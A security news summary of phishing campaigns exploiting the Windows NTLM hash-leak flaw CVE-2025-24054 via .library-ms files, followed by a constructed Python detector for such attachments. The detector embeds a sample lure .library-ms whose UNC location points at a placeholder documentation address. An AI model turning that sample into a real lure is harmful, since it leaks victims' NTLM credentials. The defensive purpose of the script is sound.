BleepingComputer reports that government organizations and private firms were targeted in separate phishing campaigns between Mar. 20 and Mar. 25 that exploited the recently patched Windows NTLM hash disclosure vulnerability tracked as CVE-2025-24054, with one of the identified IP addresses linked to the Russian state-backed threat group APT28, also known as Fancy Bear.
The initial intrusions targeted Polish and Romanian entities with phishing emails containing a Dropbox link that led to a ZIP archive holding a .library-ms file. Extracting the archive was enough to trigger the flaw: Windows opened an SMB connection to the URL specified inside the file and sent the victim's NTLM hash to the remote server, according to Check Point researchers. Further analysis of the archive revealed three other files that abuse older NTLM hash-leak vulnerabilities. A more recent campaign dropped the archive altogether and distributed emails carrying only the .library-ms attachment, which triggered NTLM authentication to the remote server as soon as the file was downloaded. Organizations have been urged not only to apply Microsoft's March 2025 updates but also to disable NTLM authentication wherever it is not needed.
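As an added example (not from the SC Media or Check Point reporting, and not a campaign artifact), here is a Python triage helper for the attachment pattern described above: it parses the XML of a .library-ms file, pulls out each declared location, and flags any that would make Windows authenticate to a host outside an assumed internal allow-list, including when the file sits inside a ZIP attachment. The sample library file, its placeholder host 203.0.113.10 (a documentation address) and the allow-list entry fileserver.corp.example are constructed for the example.

```python
"""Triage helper: flag .library-ms files (loose or inside a ZIP) whose search
connector points at a remote host. Constructed example; all sample content is
placeholder data, not material recovered from any campaign."""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Set, Tuple, Union
from urllib.parse import urlparse

# XML namespace used by Windows library description (.library-ms) files.
LIB_NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}

# Constructed sample .library-ms: a library whose only location is a UNC path on
# a remote host. 203.0.113.10 is a TEST-NET-3 documentation address used as a
# placeholder; a real lure would carry the attacker's server here.
SAMPLE_LIBRARY_MS = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\\\203.0.113.10\\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def extract_locations(doc: Union[str, bytes]) -> List[str]:
    """Return every <simpleLocation><url> value declared in a .library-ms document."""
    root = ET.fromstring(doc)
    return [u.text.strip() for u in root.iterfind(".//lib:simpleLocation/lib:url", LIB_NS) if u.text]


def location_host(location: str) -> Optional[str]:
    """Host that Windows would contact to resolve this location, or None for local paths."""
    if location.startswith("\\\\"):
        # UNC path \\host\share\...: resolving it means an SMB connection to host.
        return location[2:].split("\\", 1)[0].lower() or None
    parsed = urlparse(location)
    if parsed.scheme in ("file", "smb", "http", "https") and parsed.hostname:
        return parsed.hostname.lower()
    # Drive-letter paths parse as a one-letter "scheme" (e.g. "c") and stay local.
    return None


def is_trusted(host: str, trusted: Set[str]) -> bool:
    """Exact match or subdomain of an allow-listed internal host or domain."""
    return any(host == t or host.endswith("." + t) for t in trusted)


def triage(doc: Union[str, bytes], trusted: Set[str]) -> List[Tuple[str, str]]:
    """(location, host) pairs that would make the client authenticate to an untrusted host."""
    flagged = []
    for loc in extract_locations(doc):
        host = location_host(loc)
        if host and not is_trusted(host, trusted):
            flagged.append((loc, host))
    return flagged


def scan_zip(zip_bytes: bytes, trusted: Set[str]) -> Dict[str, List[Tuple[str, str]]]:
    """Map each .library-ms member of a ZIP attachment to its flagged locations."""
    results: Dict[str, List[Tuple[str, str]]] = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(".library-ms"):
                try:
                    results[name] = triage(zf.read(name), trusted)
                except ET.ParseError:
                    # Malformed XML is still worth a human look; flag it explicitly.
                    results[name] = [("<unparseable>", "")]
    return results


def build_sample_zip() -> bytes:
    """Constructed attachment: the sample library file plus a harmless text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Documents.library-ms", SAMPLE_LIBRARY_MS)
        zf.writestr("readme.txt", "nothing to see here")
    return buf.getvalue()


if __name__ == "__main__":
    trusted_hosts = {"fileserver.corp.example"}  # assumed internal allow-list
    for member, hits in scan_zip(build_sample_zip(), trusted_hosts).items():
        for loc, host in hits:
            print(f"{member}: {loc} -> NTLM authentication to untrusted host {host}")
```

This kind of check belongs at the mail gateway or in a detonation sandbox, not on the endpoint: on an unpatched host the SMB connection happens at extraction time, before anyone inspects the file. It complements, rather than replaces, the March 2025 update and the NTLM hardening mentioned above; blocking outbound TCP 445 to the internet at the perimeter also keeps a leaked credential from reaching an external SMB server, though not one placed inside the network.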